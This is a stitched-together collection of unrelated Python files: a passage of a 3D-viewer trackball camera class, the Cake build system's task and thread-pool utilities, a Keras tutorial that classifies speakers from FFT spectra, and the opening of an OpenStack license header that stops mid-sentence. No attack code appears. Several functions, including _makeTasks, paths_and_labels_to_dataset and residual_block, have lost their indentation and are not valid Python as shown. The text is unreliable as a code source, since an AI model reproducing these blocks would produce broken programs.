        # mindim scales rotation/pan sensitivity to the window size.
        mindim = 0.3 * np.min(self._size)

        target = self._target
        x_axis = self._pose[:3, 0].flatten()
        y_axis = self._pose[:3, 1].flatten()
        z_axis = self._pose[:3, 2].flatten()
        eye = self._pose[:3, 3].flatten()

        # Interpret drag as a rotation
        if self._state == Trackball.STATE_ROTATE:
            x_angle = -dx / mindim
            x_rot_mat = transformations.rotation_matrix(
                x_angle, y_axis, target
            )

            y_angle = dy / mindim
            y_rot_mat = transformations.rotation_matrix(
                y_angle, x_axis, target
            )

            self._n_pose = y_rot_mat.dot(x_rot_mat.dot(self._pose))

        # Interpret drag as a roll about the camera axis
        elif self._state == Trackball.STATE_ROLL:
            # Roll angle is the angle swept around the window center
            # between the press position and the current position.
            center = self._size / 2.0
            v_init = self._pdown - center
            v_curr = point - center
            v_init = v_init / np.linalg.norm(v_init)
            v_curr = v_curr / np.linalg.norm(v_curr)

            theta = (-np.arctan2(v_curr[1], v_curr[0]) +
                     np.arctan2(v_init[1], v_init[0]))

            rot_mat = transformations.rotation_matrix(theta, z_axis, target)

            self._n_pose = rot_mat.dot(self._pose)

        # Interpret drag as a camera pan in view plane
        elif self._state == Trackball.STATE_PAN:
            dx = -dx / (5.0 * mindim) * self._scale
            dy = -dy / (5.0 * mindim) * self._scale

            translation = dx * x_axis + dy * y_axis
            self._n_target = self._target + translation
            t_tf = np.eye(4)
            t_tf[:3, 3] = translation
            self._n_pose = t_tf.dot(self._pose)

        # Interpret drag as a zoom motion
        elif self._state == Trackball.STATE_ZOOM:
            radius = np.linalg.norm(eye - target)
            ratio = 0.0
            if dy > 0:
                ratio = np.exp(abs(dy) / (0.5 * self._size[1])) - 1.0
            elif dy < 0:
                ratio = 1.0 - np.exp(dy / (0.5 * (self._size[1])))
            translation = -np.sign(dy) * ratio * radius * z_axis
            t_tf = np.eye(4)
            t_tf[:3, 3] = translation
            self._n_pose = t_tf.dot(self._pose)

    def scroll(self, clicks):
        """Zoom using a mouse scroll wheel motion.

        Parameters
        ----------
        clicks : int
            The number of clicks. Positive numbers indicate forward wheel
            movement.
        """
        target = self._target
        ratio = 0.90

        mult = 1.0
        if clicks > 0:
            mult = ratio**clicks
        elif clicks < 0:
            mult = (1.0 / ratio)**abs(clicks)

        # Apply the zoom to both the in-progress pose and the anchor pose,
        # so scrolling composes correctly with an ongoing drag.
        z_axis = self._n_pose[:3, 2].flatten()
        eye = self._n_pose[:3, 3].flatten()
        radius = np.linalg.norm(eye - target)
        translation = (mult * radius - radius) * z_axis
        t_tf = np.eye(4)
        t_tf[:3, 3] = translation
        self._n_pose = t_tf.dot(self._n_pose)

        z_axis = self._pose[:3, 2].flatten()
        eye = self._pose[:3, 3].flatten()
        radius = np.linalg.norm(eye - target)
        translation = (mult * radius - radius) * z_axis
        t_tf = np.eye(4)
        t_tf[:3, 3] = translation
        self._pose = t_tf.dot(self._pose)

    def rotate(self, azimuth, axis=None):
        """Rotate the trackball about the "Up" axis by azimuth radians.

        Parameters
        ----------
        azimuth : float
            The number of radians to rotate.
        axis : (3,) float, optional
            Rotation axis; defaults to the camera's current y ("up") axis.
        """
        target = self._target

        # Rotate both poses (see scroll() for why both are updated).
        y_axis = self._n_pose[:3, 1].flatten()
        if axis is not None:
            y_axis = axis
        x_rot_mat = transformations.rotation_matrix(azimuth, y_axis, target)
        self._n_pose = x_rot_mat.dot(self._n_pose)

        y_axis = self._pose[:3, 1].flatten()
        if axis is not None:
            y_axis = axis
        x_rot_mat = transformations.rotation_matrix(azimuth, y_axis, target)
        self._pose = x_rot_mat.dot(self._pose)
| |
"""Task Utilities.
@see: Cake Build System (http://sourceforge.net/projects/cake-build)
@copyright: Copyright (c) 2010 Lewis Baker, Stuart McMahon.
@license: Licensed under the MIT license.
"""
import sys
import threading
_threadPool = None
_threadPoolLock = threading.Lock()
def setThreadPool(threadPool):
  """Set the default thread pool to use for executing new tasks.

  @param threadPool: The new default thread pool.

  @return: The previous default thread pool. This is intially None.
  """
  global _threadPool
  with _threadPoolLock:
    previousThreadPool = _threadPool
    _threadPool = threadPool
  return previousThreadPool
def getDefaultThreadPool():
  """Get the current default thread pool for new tasks.

  If no default thread pool exists then one will be created automatically.
  """
  global _threadPool
  if _threadPool is None:
    import cake.threadpool
    workerCount = cake.threadpool.getProcessorCount()
    with _threadPoolLock:
      # Double-checked locking: another thread may have created the
      # pool while we were waiting for the lock.
      if _threadPool is None:
        _threadPool = cake.threadpool.ThreadPool(numWorkers=workerCount)
  return _threadPool
class TaskError(Exception):
  """An exception type raised by the L{Task} class.

  Raised on invalid state transitions, e.g. starting a task that has
  already been started or cancelling a task that has already completed.
  """
  pass
def _makeTasks(value):
if value is None:
return []
elif isinstance(value, Task):
return [value]
else:
return list(value)
class Task(object):
  """An operation that is performed on a background thread.
  """

  class State(object):
    """A class that represents the state of a L{Task}.
    """
    NEW = "new"
    """The task is in an uninitialised state."""
    WAITING_FOR_START = "waiting for start"
    """The task is waiting to be started."""
    RUNNING = "running"
    """The task is running."""
    WAITING_FOR_COMPLETE = "waiting for complete"
    """The task is waiting to complete."""
    SUCCEEDED = "succeeded"
    """The task has succeeded."""
    FAILED = "failed"
    """The task has failed."""

  # Thread-local holding the task currently executing on this thread.
  _current = threading.local()

  def __init__(self, func=None):
    """Construct a task given a function.

    @param func: The function this task should run.
    @type func: any callable
    """
    self._func = func
    self._immediate = None
    self._threadPool = None
    self._required = False
    self._parent = Task.getCurrent()
    self._state = Task.State.NEW
    self._lock = threading.Lock()
    # +1 is added for the task itself in _start(); the task only runs
    # once every start-after dependency (and itself) has counted down.
    self._startAfterCount = 0
    self._startAfterFailures = False
    self._startAfterDependencies = None
    self._completeAfterCount = 0
    self._completeAfterFailures = False
    self._completeAfterDependencies = None
    # List of completion callbacks; set to None once the task completes.
    self._callbacks = []

  @staticmethod
  def getCurrent():
    """Get the currently executing task.

    @return: The currently executing Task or None if no current task.
    @rtype: Task or None
    """
    return getattr(Task._current, "value", None)

  @property
  def state(self):
    """Get the state of this task.
    """
    return self._state

  @property
  def parent(self):
    """Get the parent of this task.

    The parent task is the task that created this task.
    """
    return self._parent

  @property
  def required(self):
    """True if this task is required to execute, False if it
    has not yet been required to execute.
    """
    return self._required

  @property
  def started(self):
    """True if this task has been started.

    A task is started if start(), startAfter(), lazyStart(),
    lazyStartAfter() or cancel() has been called on it.
    """
    return self._state is not Task.State.NEW

  @property
  def completed(self):
    """True if this task has finished execution or has been cancelled.
    """
    s = self._state
    return s is Task.State.SUCCEEDED or s is Task.State.FAILED

  @property
  def succeeded(self):
    """True if this task successfully finished execution.
    """
    return self._state is Task.State.SUCCEEDED

  @property
  def failed(self):
    """True if this task failed or was cancelled.
    """
    return self._state is Task.State.FAILED

  @property
  def result(self):
    """If the task has completed successfully then holds the
    return value of the task, otherwise raises AttributeError.
    """
    if self.succeeded:
      task = self
      # Chase chained results: a task whose function returned another
      # task takes that task's result as its own.
      while isinstance(task._result, Task):
        task = task._result
      return task._result
    else:
      raise AttributeError("result only available on successful tasks")

  def lazyStart(self, threadPool=None):
    """Start this task only if required as a dependency of another 'required' task.

    A 'required' task is a task that is started eagerly using L{start()} or L{startAfter()}
    or a task that is a dependency of a 'required' task.

    If no other required tasks have this task as a dependency then this task will never
    be executed. i.e. it is a lazy task.
    """
    self._start(other=None, immediate=False, required=False, threadPool=threadPool)

  def lazyStartAfter(self, other, threadPool=None):
    """Start this task only if required as a dependency of another 'required' task.

    But do not start this task until the 'other' tasks have completed.
    If any of the other tasks complete with failure then this task will complete
    with failure without being executed.
    """
    self._start(other=other, immediate=False, required=False, threadPool=threadPool)

  def start(self, immediate=False, threadPool=None):
    """Start this task now.

    @param immediate: If True the task is pushed ahead of any other (waiting)
    tasks on the task queue.
    @type immediate: bool
    @param threadPool: If specified then the task will be queued up to be
    executed on the specified thread-pool. If not specified then the task
    will be queued for execution on the default thread-pool.
    @type threadPool: L{ThreadPool} or C{None}

    @raise TaskError: If this task has already been started or
    cancelled.
    """
    self._start(other=None, immediate=immediate, required=True, threadPool=threadPool)

  def startAfter(self, other, immediate=False, threadPool=None):
    """Start this task after other tasks have completed.

    This task is cancelled (transition to Task.State.FAILED state) if any of the
    other tasks fail.

    @param other: The task or a list of tasks to start after.
    @type other: L{Task} or C{list}(L{Task})
    @param immediate: If True the task is pushed ahead of any other (waiting)
    tasks on the task queue.
    @type immediate: bool
    @param threadPool: An optional thread pool to start this task on.
    If not specified then the task is queued to the default thread-pool.
    @type threadPool: L{ThreadPool} or None

    @raise TaskError: If this task has already been started or
    cancelled.
    """
    self._start(other=other, immediate=immediate, required=True, threadPool=threadPool)

  def _start(self, other, immediate, required, threadPool):
    # Common implementation behind start/startAfter/lazyStart/lazyStartAfter.
    immediate = bool(immediate)
    required = bool(required)
    otherTasks = _makeTasks(other)

    if threadPool is None:
      threadPool = getDefaultThreadPool()

    self._lock.acquire()
    try:
      if self._state is not Task.State.NEW:
        raise TaskError("task already started")
      self._state = Task.State.WAITING_FOR_START
      # +1 accounts for the self callback issued at the end of this
      # method (or of _require() for lazy tasks).
      self._startAfterCount = len(otherTasks) + 1
      self._immediate = immediate
      self._threadPool = threadPool
      if required:
        self._required = True
      else:
        # A lazy start of an already-required task still starts eagerly.
        required = self._required
      if required:
        completeAfterDependencies = self._completeAfterDependencies
        self._completeAfterDependencies = None
      else:
        # Defer dependency registration until the task becomes required.
        self._startAfterDependencies = otherTasks
    finally:
      self._lock.release()

    if required:
      for t in otherTasks:
        t._require()
        t.addCallback(lambda t=t: self._startAfterCallback(t))
      if completeAfterDependencies:
        for t in completeAfterDependencies:
          t._require()
          t.addCallback(lambda t=t: self._completeAfterCallback(t))
      self._startAfterCallback(self)

  def _require(self):
    """Flag this task as required.

    If this task was started with a call to lazyStart/lazyStartAfter()
    and has not yet been required by some other Task then this will
    cause this task and all of it's dependencies to become required.
    """
    if self.required:
      return

    startAfterDependencies = None
    completeAfterDependencies = None

    self._lock.acquire()
    try:
      # Re-check under the lock: another thread may have required us
      # between the check above and acquiring the lock.
      alreadyRequired = self.required
      if not alreadyRequired:
        startAfterDependencies = self._startAfterDependencies
        completeAfterDependencies = self._completeAfterDependencies
        self._startAfterDependencies = None
        self._completeAfterDependencies = None
        self._required = True
    finally:
      self._lock.release()

    if not alreadyRequired:
      if startAfterDependencies:
        for t in startAfterDependencies:
          t._require()
          t.addCallback(lambda t=t: self._startAfterCallback(t))
      if completeAfterDependencies:
        for t in completeAfterDependencies:
          t._require()
          t.addCallback(lambda t=t: self._completeAfterCallback(t))
      self._startAfterCallback(self)

  def _startAfterCallback(self, task):
    """Callback that is called by each task we must start after.
    """
    callbacks = None

    self._lock.acquire()
    try:
      # If one task fails we should fail too
      if task.failed:
        self._startAfterFailures = True

      # Wait for all other tasks to complete
      self._startAfterCount -= 1
      if self._startAfterCount > 0:
        return

      # Someone may have eg. cancelled us already
      if self._state is not Task.State.WAITING_FOR_START:
        return

      if self._startAfterFailures:
        self._state = Task.State.FAILED
        callbacks = self._callbacks
        self._callbacks = None
      else:
        self._state = Task.State.RUNNING
    finally:
      self._lock.release()

    if callbacks is None:
      # Task is ready to start executing, queue to thread-pool.
      self._threadPool.queueJob(self._execute, front=self._immediate)
    else:
      # Task was cancelled, call callbacks now
      for callback in callbacks:
        callback()

  def _execute(self):
    """Actually execute this task.

    This should typically be run on a background thread.
    """
    if self._state is not Task.State.RUNNING:
      assert self._state is Task.State.FAILED, "should have been cancelled"
      return

    callbacks = None
    try:
      # Make this task the 'current' task for the duration of the call
      # so that child tasks pick us up as their parent.
      old = self.getCurrent()
      self._current.value = self

      # Don't hold onto the func after it has been executed so it can
      # be garbage collected.
      func = self._func
      self._func = None
      try:
        if func is not None:
          result = func()
        else:
          result = None
      finally:
        self._current.value = old

      # If the result of the task was another task
      # then our result will be the same as that other
      # task's result. So make sure we don't complete
      # before the other task does.
      if isinstance(result, Task):
        self.completeAfter(result)

      self._lock.acquire()
      try:
        self._result = result
        if self._state is Task.State.RUNNING:
          if not self._completeAfterCount:
            callbacks = self._callbacks
            self._callbacks = None
            if not self._completeAfterFailures:
              self._state = Task.State.SUCCEEDED
            else:
              self._state = Task.State.FAILED
          else:
            # Outstanding completeAfter() dependencies; the last
            # _completeAfterCallback() performs the final transition.
            self._state = Task.State.WAITING_FOR_COMPLETE
        else:
          assert self._state is Task.State.FAILED, "should have been cancelled"
      finally:
        self._lock.release()
    # Fix: was the Python-2-only 'except Exception, e' syntax; 'as' is
    # valid on Python 2.6+ and required on Python 3.
    except Exception as e:
      trace = sys.exc_info()[2]
      self._lock.acquire()
      try:
        self._exception = e
        self._trace = trace
        if self._state is Task.State.RUNNING:
          if not self._completeAfterCount:
            callbacks = self._callbacks
            self._callbacks = None
            self._state = Task.State.FAILED
          else:
            self._state = Task.State.WAITING_FOR_COMPLETE
        else:
          assert self._state is Task.State.FAILED, "should have been cancelled"
      finally:
        self._lock.release()

    if callbacks:
      for callback in callbacks:
        callback()

  def completeAfter(self, other):
    """Make sure this task doesn't complete until other tasks have completed.

    @param other: The Task or list of Tasks to wait for.
    @type other: L{Task} or C{list}(L{Task})

    @raise TaskError: If this task has already finished executing.
    """
    otherTasks = _makeTasks(other)

    self._lock.acquire()
    try:
      if self.completed:
        raise TaskError("Task function has already finished executing.")
      required = self.required
      if not required:
        # This task not yet required
        # Record it's dependencies in case it later becomes required
        dependencies = self._completeAfterDependencies
        if dependencies is None:
          self._completeAfterDependencies = otherTasks
        else:
          dependencies.extend(otherTasks)
      self._completeAfterCount += len(otherTasks)
    finally:
      self._lock.release()

    if required:
      # This task was already required so we'll require the new
      # dependencies immediately.
      for t in otherTasks:
        t._require()
        t.addCallback(lambda t=t: self._completeAfterCallback(t))

  def _completeAfterCallback(self, task):
    """Callback that is called by each task we must complete after.
    """
    callbacks = None

    self._lock.acquire()
    try:
      self._completeAfterCount -= 1
      if task.failed:
        self._completeAfterFailures = True
      if self._state is Task.State.WAITING_FOR_COMPLETE and self._completeAfterCount == 0:
        # hasattr(self, "_result") distinguishes a task whose function
        # completed normally from one that raised (which sets _exception).
        if hasattr(self, "_result") and not self._completeAfterFailures:
          self._state = Task.State.SUCCEEDED
        else:
          self._state = Task.State.FAILED
        callbacks = self._callbacks
        self._callbacks = None
    finally:
      self._lock.release()

    if callbacks:
      for callback in callbacks:
        callback()

  def cancel(self):
    """Cancel this task if it hasn't already started.

    Completes the task, setting its state to Task.State.FAILED.

    @raise TaskError: if the task has already completed.
    """
    self._lock.acquire()
    try:
      if self.completed:
        raise TaskError("Task already completed")
      self._state = Task.State.FAILED
      callbacks = self._callbacks
      self._callbacks = None
    finally:
      self._lock.release()

    for callback in callbacks:
      callback()

  def addCallback(self, callback):
    """Register a callback to be run when this task is complete.

    @param callback: The callback to add.
    @type callback: any callable
    """
    if not self.completed:
      self._lock.acquire()
      try:
        callbacks = self._callbacks
        if callbacks is not None:
          # Task is not yet complete, queue up callback to execute later.
          callbacks.append(callback)
          return
      finally:
        self._lock.release()
    # Task already completed: run the callback immediately.
    callback()
| |
"""
Title: Speaker Recognition
Author: [Fadi Badine](https://twitter.com/fadibadine)
Date created: 14/06/2020
Last modified: 03/07/2020
Description: Classify speakers using Fast Fourier Transform (FFT) and a 1D Convnet.
"""
"""
## Introduction
This example demonstrates how to create a model to classify speakers from the
frequency domain representation of speech recordings, obtained via Fast Fourier
Transform (FFT).
It shows the following:
- How to use `tf.data` to load, preprocess and feed audio streams into a model
- How to create a 1D convolutional network with residual
connections for audio classification.
Our process:
- We prepare a dataset of speech samples from different speakers, with the speaker as label.
- We add background noise to these samples to augment our data.
- We take the FFT of these samples.
- We train a 1D convnet to predict the correct speaker given a noisy FFT speech sample.
Note:
- This example should be run with TensorFlow 2.3 or higher, or `tf-nightly`.
- The noise samples in the dataset need to be resampled to a sampling rate of 16000 Hz
before using the code in this example. In order to do this, you will need to have
installed `ffmpeg`.
"""
"""
## Setup
"""
import os
import shutil
import numpy as np
import tensorflow as tf
from tensorflow import keras
from pathlib import Path
from IPython.display import display, Audio
# Get the data from https://www.kaggle.com/kongaevans/speaker-recognition-dataset/download
# and save it to the 'Downloads' folder in your HOME directory
DATASET_ROOT = os.path.join(os.path.expanduser("~"), "Downloads/16000_pcm_speeches")

# The folders in which we will put the audio samples and the noise samples
AUDIO_SUBFOLDER = "audio"
NOISE_SUBFOLDER = "noise"

DATASET_AUDIO_PATH = os.path.join(DATASET_ROOT, AUDIO_SUBFOLDER)
DATASET_NOISE_PATH = os.path.join(DATASET_ROOT, NOISE_SUBFOLDER)

# Percentage of samples to use for validation
VALID_SPLIT = 0.1

# Seed to use when shuffling the dataset and the noise
SHUFFLE_SEED = 43

# The sampling rate to use.
# This is the one used in all of the audio samples.
# We will resample all of the noise to this sampling rate.
# This will also be the output size of the audio wave samples
# (since all samples are of 1 second long)
SAMPLING_RATE = 16000

# The factor to multiply the noise with according to:
#   noisy_sample = sample + noise * prop * scale
# where prop = sample_amplitude / noise_amplitude
SCALE = 0.5

# Training hyper-parameters.
BATCH_SIZE = 128
EPOCHS = 100
"""
## Data preparation
The dataset is composed of 7 folders, divided into 2 groups:
- Speech samples, with 5 folders for 5 different speakers. Each folder contains
1500 audio files, each 1 second long and sampled at 16000 Hz.
- Background noise samples, with 2 folders and a total of 6 files. These files
are longer than 1 second (and originally not sampled at 16000 Hz, but we will resample them to 16000 Hz).
We will use those 6 files to create 354 1-second-long noise samples to be used for training.
Let's sort these 2 categories into 2 folders:
- An `audio` folder which will contain all the per-speaker speech sample folders
- A `noise` folder which will contain all the noise samples
"""
"""
Before sorting the audio and noise categories into 2 folders,
we have the following directory structure:
```
main_directory/
...speaker_a/
...speaker_b/
...speaker_c/
...speaker_d/
...speaker_e/
...other/
..._background_noise_/
```
After sorting, we end up with the following structure:
```
main_directory/
...audio/
......speaker_a/
......speaker_b/
......speaker_c/
......speaker_d/
......speaker_e/
...noise/
......other/
......_background_noise_/
```
"""
# Ensure the `audio` and `noise` target folders exist.
# os.makedirs(..., exist_ok=True) replaces the exists()-then-makedirs()
# pattern, which is race-prone and unidiomatic (`... is False`).
os.makedirs(DATASET_AUDIO_PATH, exist_ok=True)
os.makedirs(DATASET_NOISE_PATH, exist_ok=True)

for folder in os.listdir(DATASET_ROOT):
    if os.path.isdir(os.path.join(DATASET_ROOT, folder)):
        if folder in [AUDIO_SUBFOLDER, NOISE_SUBFOLDER]:
            # If folder is `audio` or `noise`, do nothing
            continue
        elif folder in ["other", "_background_noise_"]:
            # If folder is one of the folders that contains noise samples,
            # move it to the `noise` folder
            shutil.move(
                os.path.join(DATASET_ROOT, folder),
                os.path.join(DATASET_NOISE_PATH, folder),
            )
        else:
            # Otherwise, it should be a speaker folder, then move it to
            # `audio` folder
            shutil.move(
                os.path.join(DATASET_ROOT, folder),
                os.path.join(DATASET_AUDIO_PATH, folder),
            )
"""
## Noise preparation
In this section:
- We load all noise samples (which should have been resampled to 16000)
- We split those noise samples into chunks of 16000 samples which
correspond to 1 second duration each
"""
# Collect every .wav file found one level below DATASET_NOISE_PATH.
noise_paths = []
for entry in os.listdir(DATASET_NOISE_PATH):
    entry_path = Path(DATASET_NOISE_PATH) / entry
    if not os.path.isdir(entry_path):
        continue
    noise_paths.extend(
        os.path.join(entry_path, fname)
        for fname in os.listdir(entry_path)
        if fname.endswith(".wav")
    )

print(
    "Found {} files belonging to {} directories".format(
        len(noise_paths), len(os.listdir(DATASET_NOISE_PATH))
    )
)
"""
Resample all noise samples to 16000 Hz
"""
# Shell one-liner: for every .wav under DATASET_NOISE_PATH, probe its
# sample rate with ffprobe and re-encode to 16 kHz via ffmpeg when needed
# (in place, through a temp.wav intermediate).  Requires ffmpeg/ffprobe
# on PATH and a POSIX shell.
# NOTE(review): DATASET_NOISE_PATH is interpolated into a shell command
# executed via os.system — safe only because the path is built from the
# user's home directory above; do not reuse with untrusted paths.
command = (
    "for dir in `ls -1 " + DATASET_NOISE_PATH + "`; do "
    "for file in `ls -1 " + DATASET_NOISE_PATH + "/$dir/*.wav`; do "
    "sample_rate=`ffprobe -hide_banner -loglevel panic -show_streams "
    "$file | grep sample_rate | cut -f2 -d=`; "
    "if [ $sample_rate -ne 16000 ]; then "
    "ffmpeg -hide_banner -loglevel panic -y "
    "-i $file -ar 16000 temp.wav; "
    "mv temp.wav $file; "
    "fi; done; done"
)

os.system(command)
# Split noise into chunks of 16,000 steps each
# Split noise into chunks of 16,000 steps each
def load_noise_sample(path):
    """Load a noise wav file and cut it into 1-second slices.

    Returns a list of tensors with SAMPLING_RATE samples each, or None
    when the file's sampling rate is not SAMPLING_RATE.
    """
    sample, sampling_rate = tf.audio.decode_wav(
        tf.io.read_file(path), desired_channels=1
    )
    if sampling_rate != SAMPLING_RATE:
        print("Sampling rate for {} is incorrect. Ignoring it".format(path))
        return None
    # Keep only whole seconds, then split into equal 1-second chunks.
    num_slices = int(sample.shape[0] / SAMPLING_RATE)
    return tf.split(sample[: num_slices * SAMPLING_RATE], num_slices)
# Load every noise file and gather its 1-second slices; files with the
# wrong sampling rate are skipped (load_noise_sample returns None).
noises = []
for path in noise_paths:
    sample = load_noise_sample(path)
    if sample:
        noises.extend(sample)
# Stack all slices into one tensor; axis 0 indexes the noise samples.
noises = tf.stack(noises)

print(
    "{} noise files were split into {} noise samples where each is {} sec. long".format(
        len(noise_paths), noises.shape[0], noises.shape[1] // SAMPLING_RATE
    )
)
"""
## Dataset generation
"""
def paths_and_labels_to_dataset(audio_paths, labels):
"""Constructs a dataset of audios and labels."""
path_ds = tf.data.Dataset.from_tensor_slices(audio_paths)
audio_ds = path_ds.map(
lambda x: path_to_audio(x), num_parallel_calls=tf.data.AUTOTUNE
)
label_ds = tf.data.Dataset.from_tensor_slices(labels)
return tf.data.Dataset.zip((audio_ds, label_ds))
def path_to_audio(path):
    """Reads and decodes an audio file into a mono waveform tensor."""
    audio = tf.io.read_file(path)
    # Decode as 1 channel, capped at SAMPLING_RATE samples (one second)
    audio, _ = tf.audio.decode_wav(audio, 1, SAMPLING_RATE)
    return audio
def add_noise(audio, noises=None, scale=0.5):
    """Mix one randomly chosen noise chunk into every sample of the batch.

    The noise is first rescaled to the audio's peak amplitude, so `scale`
    is a proportion relative to the signal level. No-op if noises is None.
    """
    if noises is not None:
        # Create a random tensor of the same size as audio ranging from
        # 0 to the number of noise stream samples that we have.
        tf_rnd = tf.random.uniform(
            (tf.shape(audio)[0],), 0, noises.shape[0], dtype=tf.int32
        )
        noise = tf.gather(noises, tf_rnd, axis=0)
        # Get the amplitude proportion between the audio and the noise
        prop = tf.math.reduce_max(audio, axis=1) / tf.math.reduce_max(noise, axis=1)
        prop = tf.repeat(tf.expand_dims(prop, axis=1), tf.shape(audio)[1], axis=1)
        # Adding the rescaled noise to audio
        audio = audio + noise * prop * scale
    return audio
def audio_to_fft(audio):
    """Return the magnitude of the positive-frequency half of the FFT.

    Input is a batch of waveforms (batch, samples, 1); output is
    (batch, samples // 2, 1).
    """
    # Since tf.signal.fft applies FFT on the innermost dimension,
    # we need to squeeze the dimensions and then expand them again
    # after FFT
    audio = tf.squeeze(audio, axis=-1)
    fft = tf.signal.fft(
        tf.cast(tf.complex(real=audio, imag=tf.zeros_like(audio)), tf.complex64)
    )
    fft = tf.expand_dims(fft, axis=-1)
    # Return the absolute value of the first half of the FFT
    # which represents the positive frequencies
    return tf.math.abs(fft[:, : (audio.shape[1] // 2), :])
# Get the list of audio file paths along with their corresponding labels.
# Each sub-folder of DATASET_AUDIO_PATH is one speaker; the label is the
# speaker's integer index into class_names.
class_names = os.listdir(DATASET_AUDIO_PATH)
print("Our class names: {}".format(class_names,))
audio_paths = []
labels = []
for label, name in enumerate(class_names):
    print("Processing speaker {}".format(name,))
    dir_path = Path(DATASET_AUDIO_PATH) / name
    speaker_sample_paths = [
        os.path.join(dir_path, filepath)
        for filepath in os.listdir(dir_path)
        if filepath.endswith(".wav")
    ]
    audio_paths += speaker_sample_paths
    labels += [label] * len(speaker_sample_paths)
print(
    "Found {} files belonging to {} classes.".format(len(audio_paths), len(class_names))
)
# Shuffle paths and labels with the same seeded RNG so the pairs stay aligned
rng = np.random.RandomState(SHUFFLE_SEED)
rng.shuffle(audio_paths)
rng = np.random.RandomState(SHUFFLE_SEED)
rng.shuffle(labels)
# Split into training and validation.
# Use an explicit split index: the previous `[:-num_val_samples]` /
# `[-num_val_samples:]` slicing broke when num_val_samples == 0 (tiny
# dataset or VALID_SPLIT == 0), because `x[:-0]` is `x[:0]` (empty) and
# `x[-0:]` is the whole list.
num_val_samples = int(VALID_SPLIT * len(audio_paths))
num_train_samples = len(audio_paths) - num_val_samples
print("Using {} files for training.".format(num_train_samples))
train_audio_paths = audio_paths[:num_train_samples]
train_labels = labels[:num_train_samples]
print("Using {} files for validation.".format(num_val_samples))
valid_audio_paths = audio_paths[num_train_samples:]
valid_labels = labels[num_train_samples:]
# Create 2 datasets, one for training and the other for validation
train_ds = paths_and_labels_to_dataset(train_audio_paths, train_labels)
train_ds = train_ds.shuffle(buffer_size=BATCH_SIZE * 8, seed=SHUFFLE_SEED).batch(
    BATCH_SIZE
)
valid_ds = paths_and_labels_to_dataset(valid_audio_paths, valid_labels)
valid_ds = valid_ds.shuffle(buffer_size=32 * 8, seed=SHUFFLE_SEED).batch(32)
# Add noise to the training set (only; validation stays clean here)
train_ds = train_ds.map(
    lambda x, y: (add_noise(x, noises, scale=SCALE), y),
    num_parallel_calls=tf.data.AUTOTUNE,
)
# Transform audio wave to the frequency domain using `audio_to_fft`
train_ds = train_ds.map(
    lambda x, y: (audio_to_fft(x), y), num_parallel_calls=tf.data.AUTOTUNE
)
train_ds = train_ds.prefetch(tf.data.AUTOTUNE)
valid_ds = valid_ds.map(
    lambda x, y: (audio_to_fft(x), y), num_parallel_calls=tf.data.AUTOTUNE
)
valid_ds = valid_ds.prefetch(tf.data.AUTOTUNE)
"""
## Model Definition
"""
def residual_block(x, filters, conv_num=3, activation="relu"):
# Shortcut
s = keras.layers.Conv1D(filters, 1, padding="same")(x)
for i in range(conv_num - 1):
x = keras.layers.Conv1D(filters, 3, padding="same")(x)
x = keras.layers.Activation(activation)(x)
x = keras.layers.Conv1D(filters, 3, padding="same")(x)
x = keras.layers.Add()([x, s])
x = keras.layers.Activation(activation)(x)
return keras.layers.MaxPool1D(pool_size=2, strides=2)(x)
def build_model(input_shape, num_classes):
    """Build the classifier: a stack of residual blocks, pooling, and a
    softmax head over `num_classes` speakers."""
    inputs = keras.layers.Input(shape=input_shape, name="input")
    x = residual_block(inputs, 16, 2)
    x = residual_block(x, 32, 2)
    x = residual_block(x, 64, 3)
    x = residual_block(x, 128, 3)
    x = residual_block(x, 128, 3)
    x = keras.layers.AveragePooling1D(pool_size=3, strides=3)(x)
    x = keras.layers.Flatten()(x)
    x = keras.layers.Dense(256, activation="relu")(x)
    x = keras.layers.Dense(128, activation="relu")(x)
    outputs = keras.layers.Dense(num_classes, activation="softmax", name="output")(x)
    return keras.models.Model(inputs=inputs, outputs=outputs)
# Input is the positive half of the FFT: SAMPLING_RATE // 2 frequency bins
model = build_model((SAMPLING_RATE // 2, 1), len(class_names))
model.summary()
# Compile the model using Adam's default learning rate
model.compile(
    optimizer="Adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"]
)
# Add callbacks:
# 'EarlyStopping' to stop training when the model is not enhancing anymore
# 'ModelCheckPoint' to always keep the model that has the best val_accuracy
model_save_filename = "model.h5"
earlystopping_cb = keras.callbacks.EarlyStopping(patience=10, restore_best_weights=True)
mdlcheckpoint_cb = keras.callbacks.ModelCheckpoint(
    model_save_filename, monitor="val_accuracy", save_best_only=True
)
"""
## Training
"""
history = model.fit(
    train_ds,
    epochs=EPOCHS,
    validation_data=valid_ds,
    callbacks=[earlystopping_cb, mdlcheckpoint_cb],
)
"""
## Evaluation
"""
print(model.evaluate(valid_ds))
"""
We get ~ 98% validation accuracy.
"""
"""
## Demonstration
Let's take some samples and:
- Predict the speaker
- Compare the prediction with the real speaker
- Listen to the audio to see that despite the samples being noisy,
the model is still pretty accurate
"""
SAMPLES_TO_DISPLAY = 10
test_ds = paths_and_labels_to_dataset(valid_audio_paths, valid_labels)
test_ds = test_ds.shuffle(buffer_size=BATCH_SIZE * 8, seed=SHUFFLE_SEED).batch(
BATCH_SIZE
)
test_ds = test_ds.map(
lambda x, y: (add_noise(x, noises, scale=SCALE), y),
num_parallel_calls=tf.data.AUTOTUNE,
)
for audios, labels in test_ds.take(1):
    # Get the signal FFT
    ffts = audio_to_fft(audios)
    # Predict
    y_pred = model.predict(ffts)
    # Take random samples
    rnd = np.random.randint(0, BATCH_SIZE, SAMPLES_TO_DISPLAY)
    audios = audios.numpy()[rnd, :, :]
    labels = labels.numpy()[rnd]
    y_pred = np.argmax(y_pred, axis=-1)[rnd]
    for index in range(SAMPLES_TO_DISPLAY):
        # For every sample, print the true and predicted label
        # as well as run the voice with the noise.
        # "\33[92m" / "\33[91m" are ANSI escapes: green when the prediction
        # matches the label, red otherwise.
        print(
            "Speaker:\33{} {}\33[0m\tPredicted:\33{} {}\33[0m".format(
                "[92m" if labels[index] == y_pred[index] else "[91m",
                class_names[labels[index]],
                "[92m" if labels[index] == y_pred[index] else "[91m",
                class_names[y_pred[index]],
            )
        )
        display(Audio(audios[index, :, :].squeeze(), rate=SAMPLING_RATE))
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
